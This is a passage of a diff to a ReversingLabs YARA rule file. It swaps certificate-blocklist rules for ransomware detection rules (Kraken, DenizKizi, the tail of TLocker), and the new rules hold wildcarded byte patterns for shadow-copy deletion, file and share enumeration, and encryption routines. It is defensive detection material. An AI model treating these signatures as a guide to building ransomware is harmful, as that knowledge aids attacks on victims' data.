?? ?? ?? ?? 85 C0 74 1C 8B 45 ?? 85 C0 74 ?? 6A ?? 6A ?? 8D 4D ?? 51 53 03 F8 FF 15 + ?? ?? ?? ?? 85 C0 75 A0 85 F6 74 10 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 33 C0 5E 8B E5 5D C3 + } + $tlocker_remove_shadow_copies = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 57 6A ?? 33 FF 57 50 FF 15 ?? ?? ?? ?? 8B D8 + 3B DF 0F 84 DC 00 00 00 56 8D B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 5E B8 ?? ?? ?? ?? 8B D3 2B D0 0F B7 08 66 89 0C + 02 83 C0 ?? 66 3B CF 75 F1 6A ?? 8D 95 ?? ?? ?? ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? + 51 8D 95 ?? ?? ?? ?? 52 57 68 ?? ?? ?? ?? 57 57 57 53 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 0F FF + 15 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B F8 83 BD ?? ?? ?? ?? ?? 74 0B 8B B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 + 6A ?? 50 FF 15 ?? ?? ?? ?? 5E 8B C7 5F 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33 CD B8 ?? ?? ?? ?? 5B + E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $tlocker_find_files = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 0D ?? ?? ?? ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33 F6 56 51 + 89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 AD 01 00 00 53 56 56 6A ?? 56 FF 15 ?? ?? ?? ?? + 85 C0 0F 88 89 01 00 00 68 ?? ?? ?? ?? 53 53 FF 15 ?? ?? ?? ?? 8B C3 8D 50 ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85 + C9 75 F5 2B C2 D1 F8 8B F8 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 4D 01 00 00 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 15 01 00 00 F6 85 ?? ?? ?? ?? ?? 0F 84 EC 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 + 83 D8 ?? 85 C0 0F 84 AE 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 + 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 74 74 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF + 66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 03 C7 8D 44 00 ?? 85 C0 74 6C 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? + 8B F0 85 F6 74 57 53 8D 4F ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 56 56 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF + 15 ?? ?? ?? ?? 85 C0 0F 85 EB FE FF FF 8B 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? + ?? 8B 15 ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Red GmbH" and (pe.signatures[i].serial=="00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures[i].serial=="b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a") and 1581936420<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($tlocker_ep and $tlocker_get_server_data and $tlocker_remove_shadow_copies and $tlocker_find_files) and ($tlocker_contact_server_1 or ($tlocker_contact_server_2_1 and $tlocker_contact_server_2_2))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_08653Ef2Ed9E6Ebb56Ffa7E93F963235 : INFO FILE +rule REVERSINGLABS_Linux_Ransomware_Kraken : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Kraken ransomware." author = "ReversingLabs" - id = "9ac976c0-260f-5207-ae39-bbb722c38a92" - date = "2023-11-08" - modified = "2023-11-08" + id = "7c302c2e-6ffc-5f51-90f4-c4ebd6c1c28b" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3828-L3844" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5ae8d2fb03cd0f945c2f5eb86de4e5da4fbb1cdf233d8a808157304538ced872" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Kraken.yara#L1-L151" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4a3867aba4dbdce5d008331a3058f57b00db246975fc4d77b79ab49d5f0bbb15" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Kraken" + tc_detection_factor = 5 importance = 25 + strings: + $enum_volumes = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 04 ?? 00 A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 50 45 4C 00 C7 45 + FC 00 00 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? + ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? + 8A 06 84 C0 0F 84 ?? ?? ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8B D4 + C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 83 7A ?? ?? 72 ?? 8B 02 EB ?? 8B C2 C6 00 + ?? 80 3E ?? 75 ?? 33 C9 EB ?? 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 51 56 8B CA + E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 C6 ?? E9 ?? ?? ?? ?? BA ?? + ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? + ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? 68 ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 + ?? ?? ?? ?? 8B E5 5D C3 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? B8 ?? ?? ?? ?? C3 + } + $enum_shares_p1 = { + 50 56 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F + 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 66 0F 1F 44 00 ?? FF 75 ?? 6A ?? FF + 15 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 56 8D 45 ?? 89 75 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? + 85 C0 0F 85 ?? ?? ?? ?? 33 FF 0F 1F 40 ?? 3B 7D ?? 0F 83 ?? ?? ?? ?? 8B C7 C1 E0 ?? + 03 F0 F7 46 ?? ?? ?? ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 06 83 C4 ?? 8B C8 0F 11 + 00 0F 10 46 ?? 0F 11 40 ?? E8 ?? ?? ?? ?? 8B 75 ?? B3 ?? 47 EB ?? F7 46 ?? ?? ?? ?? + ?? 0F 84 ?? ?? ?? ?? 8B 56 ?? 85 D2 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? C6 45 ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 71 ?? 8A 01 41 84 C0 75 + ?? 2B CE 51 52 8D 4D ?? E8 ?? ?? ?? ?? 51 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B + C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B + } + $enum_shares_p2 = { + 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 + ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 + 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 55 ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? + ?? ?? ?? 83 C4 ?? 8D 55 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ?? + C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 + C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? + E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 + ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ?? + 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? + E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B + C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? + 8B 75 ?? B3 ?? 47 E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? BA + ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 E9 ?? ?? + ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? + ?? ?? ?? C3 + } + $find_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? + ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D 4D ?? + C6 45 ?? ?? 8B 75 ?? 83 FE ?? 8B 7D ?? 8B 55 ?? 0F 43 CF 6A ?? 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43 CF 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43 + CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? + 6A ?? 0F 43 CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57 + C0 C7 45 ?? ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? 83 FE ?? C6 45 ?? ?? 8D 4D ?? 0F 43 CF E8 ?? ?? ?? ?? 8B F0 89 75 + ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B D6 50 8B CE E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ?? + 85 DB 0F 84 ?? ?? ?? ?? 8D 7B ?? B9 ?? ?? ?? ?? 8B C7 66 0F 1F 44 00 ?? 8A 10 3A 11 + 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 F6 EB ?? + 1B F6 83 CE ?? B9 ?? ?? ?? ?? 8B C7 0F 1F 40 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 + ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 3B F0 8B + 75 ?? 0F 85 ?? ?? ?? ?? 8B 43 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 57 3D ?? ?? ?? ?? + 75 ?? E8 ?? ?? ?? ?? 50 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC + ?? C6 45 ?? ?? 8B CC 8B D0 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D + ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 EC ?? C6 45 ?? ?? 8B CC 8D 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 + ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? + 83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ?? + ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? B8 ?? ?? ?? ?? C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? + ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD + E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? + ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 C6 45 ?? + ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 + 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 45 ?? 6A ?? + 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 + ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 + ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D + 4D ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 7D ?? 0F 43 05 ?? ?? ?? ?? 83 FF ?? FF + 35 ?? ?? ?? ?? 8B 75 ?? 0F 43 CE 8B 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? + ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 + C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 + } + $encrypt_files_p2 = { + 84 C0 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? + ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 + ?? 6A ?? 0F 43 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B + D8 83 FB ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 68 ?? + ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 1B D7 01 05 + ?? ?? ?? ?? 11 15 ?? ?? ?? ?? 83 65 ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 8B FA + 8B F0 8B 55 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 6A ?? 1B D7 01 05 ?? ?? ?? ?? + 8B 45 ?? 11 15 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 6A ?? 83 15 ?? ?? ?? ?? ?? 6A ?? 53 FF + 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 FF 75 ?? FF 35 ?? ?? + ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 53 1B D7 01 05 ?? ?? ?? ?? 11 15 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 51 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 83 + 79 ?? ?? 72 ?? 8B 09 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? + ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? + 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Haw Farm LIMITED" and pe.signatures[i].serial=="08:65:3e:f2:ed:9e:6e:bb:56:ff:a7:e9:3f:96:32:35" and 1581465601<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_volumes and $find_files and ( all of ($enum_shares_p*)) and ( all of ($encrypt_files_p*))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_9C4816D900A6Ecdbe54Adf72B19Ebcf5 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Denizkizi : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects DenizKizi ransomware." author = "ReversingLabs" - id = "bd22372d-774b-5e25-b4e5-47d34fe1c40b" - date = "2023-11-08" - modified = "2023-11-08" + id = "e16a00d6-d5b8-5702-9cd7-d037b0ff46a3" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3846-L3864" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "92e8130f444417d5bc3788721280338bbed33e3362104de0cf27bc7c1fc30d0e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.DenizKizi.yara#L1-L88" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fbeb01263d6f68141e094ba8fb1c1a54c601ab24292f5c6b0eb8cb0c49f46afc" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "DenizKizi" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Datamingo Limited" and (pe.signatures[i].serial=="00:9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5" or pe.signatures[i].serial=="9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5") and 1557187200<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_269174F9Fe7C6Ed4E1D19B26C3F5B35F : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "fbcf1f18-f612-5516-9a67-2564de76c456" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3866-L3882" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "95c9720d6311c2fe7026b6cac092d59967479e6c9382eac1d26f7745efa92860" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files = { + 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? + ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? + 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B + 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? + ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 + ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3 + } + $encrypt_files = { + 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? + ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 + FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? + ?? ?? 